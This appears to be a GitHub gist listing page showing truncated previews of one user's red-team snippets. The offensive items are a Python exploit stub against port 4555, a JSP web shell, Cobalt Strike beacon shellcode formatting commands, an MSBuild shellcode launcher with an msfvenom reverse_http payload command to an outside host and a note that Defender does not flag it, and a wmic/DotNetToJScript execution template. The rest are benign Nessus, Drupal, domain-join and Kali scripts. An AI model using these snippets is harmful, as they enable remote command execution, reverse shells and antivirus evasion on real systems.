Skip to content

Instantly share code, notes, and snippets.

#!/usr/bin/python
import socket
import sys
import os
host = 'TARGET IP ADDRESS HERE'
port = 4555
try:
@0xhexmex
0xhexmex / FindHTTPinNessus.ps1
Last active December 1, 2018 22:05 — forked from nullbind/FindIIS6inNessus.ps1
This script can be used to extract a list of HTTP servers from .nessus files.
# This script can be used to extract a list of HTTP servers from .nessus files.
# Original Author: Scott Sutherland, NetSPI 2017
# Modified by KM 11/2018 to extract a list of all HTTP servers, not just IIS6
# Instructions: Run the script in a directory containing only .nessus files. Super dirty/slow, but functional.
# Create an output table
$outputtbl =New-Object System.Data.DataTable
$outputtbl.Columns.Add("IpAddress") | Out-Null
$outputtbl.Columns.Add("WebServerVersion") | Out-Null
@0xhexmex
0xhexmex / install-drupal.sh
Created March 21, 2019 19:00
Install drupal on a linux box
# Another gem from Joaquim Nogueira (@lkys37en)
#!/bin/bash
#Reference:https://www.valuebound.com/resources/blog/Installing-drupal-with-drush-the-basics
#Reference:https://websiteforstudents.com/install-drupal-cms-on-ubuntu-16-04-lts-with-apache2-mariadb-php-7-1-and-lets-encrypt-ssl-tls/
print_usage() {
echo ""
echo "Usage: $0 -v drupal-8.5.0 -p Welcome1"
echo
@0xhexmex
0xhexmex / Get-KerberosKeytab.ps1
Created February 14, 2019 21:50 — forked from raandree/Get-KerberosKeytab.ps1
Parses Kerberos Keytab files
param(
[Parameter(Mandatory)]
[string]$Path
)
#Created by Pierre.Audonnet@microsoft.com
#
#Got keytab structure from http://www.ioplex.com/utilities/keytab.txt
#
# keytab {
@0xhexmex
0xhexmex / cmd.jsp
Created September 8, 2020 00:50 — forked from ErosLever/cmd.jsp
A simple and minimal yet effective JSP Web Shell that escapes command output as HTML entities as needed.
<form method="GET" action="">
<input type="text" name="cmd" />
<input type="submit" value="Exec!" />
</form> <%!
public String esc(String str){
StringBuffer sb = new StringBuffer();
for(char c : str.toCharArray())
if( c >= '0' && c <= '9' || c >= 'A' && c <= 'Z' || c >= 'a' && c <= 'z' || c == ' ' )
sb.append( c );
else
@0xhexmex
0xhexmex / formatting.txt
Last active October 21, 2020 16:57
Random shellcode formatting tips
// Take a stageless CS Beacon raw payload and convert to shellcode in the '\xAA\xBB...' format
# Attacks > Packages > Windows Executable (S) > Raw. Save as beacon.bin
# hexdump -v -e '"\\x" 1/1 "%02X"' ./beacon.bin
// Take any raw shellcode file and get the hex from it in the 'fe9820fa...' format
# xxd -p -c 100000000000000000 ./payload.bin
@0xhexmex
0xhexmex / msbuild-shellcode.xml
Last active October 21, 2020 16:58
Msbuild shellcode executor
/* Template taken from https://github.com/infosecn1nja/MaliciousMacroMSBuild/blob/master/templates/MSBuild_shellcode.csproj
Example to create a CS beacon stager, base64-encoded to insert into "strShellCode" variable below
msfvenom -p windows/meterpeter/reverse_http LHOST=1.1.1.1 LPORT=443 -f raw -o /tmp/payload.bin && base64 -w0 /tmp/payload.bin
Then execute this on target with "C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe .\msbuild-shellcode.xml"
Defender doesn't flag on this (as of 5/30/19)
*/
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="[TARGETNAME]">
<ClassExample />
@0xhexmex
0xhexmex / joindomain.sh
Created March 21, 2019 13:48
Join a linux host to an AD domain
# Created by Joaquim Nogueira (@lkys37en), March 2019. I take no credit for this awesome work :)
#!/bin/bash
print_usage() {
echo ""
echo "A huge thank you to Brax from proslackers for helping me with this script, thank you!"
echo ""
echo "Usage: $0 -d lkylabs.com -u Administrator -p Welcome1! -o OU=Linux-Servers,OU=Servers,OU=Computers,OU=lkylabs,DC=lkylabs,DC=com -s 'lkylabs\\domain^admins lkylabs\\linux^admins' -x 'lkylabs\\domain^admins'"
echo
@0xhexmex
0xhexmex / generic-shellcode-launcher.cs
Last active January 15, 2021 08:39
wmic code execution template
// Template taken from https://github.com/infosecn1nja/MaliciousMacroMSBuild/blob/master/templates/MSBuild_shellcode.csproj
// Compile: C:\windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:c:\test.exe /platform:x86 /unsafe mylauncher.cs
// Or as dll: C:\windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:c:\test.dll /platform:x86 /target:library /unsafe mylauncher.cs
// Then DotNetToJScript.exe -v Auto -l JScript -o mylauncher.js -c ShellCodeLauncher.Program c:\test.dll
// mylauncher.js can be put into something like a WMIC XSL template like so...
/*
// wmic-template.xsl
// wmic os get /format:wmic-template.xsl (if you create x86 shellcode, need to use x86 version of wmic here - c:\windows\syswow64\wbem\wmic.exe)
@0xhexmex
0xhexmex / fixterm.sh
Last active April 21, 2022 21:03
Remove zsh auto-suggestions and syntax highlighting from AWS Kali AMI
#!/bin/zsh
# Turn off auto suggestions
rm /usr/share/zsh-autosuggestions/zsh-autosuggestions.zsh
# Turn off syntax highlighting
rm /usr/share/zsh-syntax-highlighting/zsh-syntax-highlighting.zsh
# Reload terminal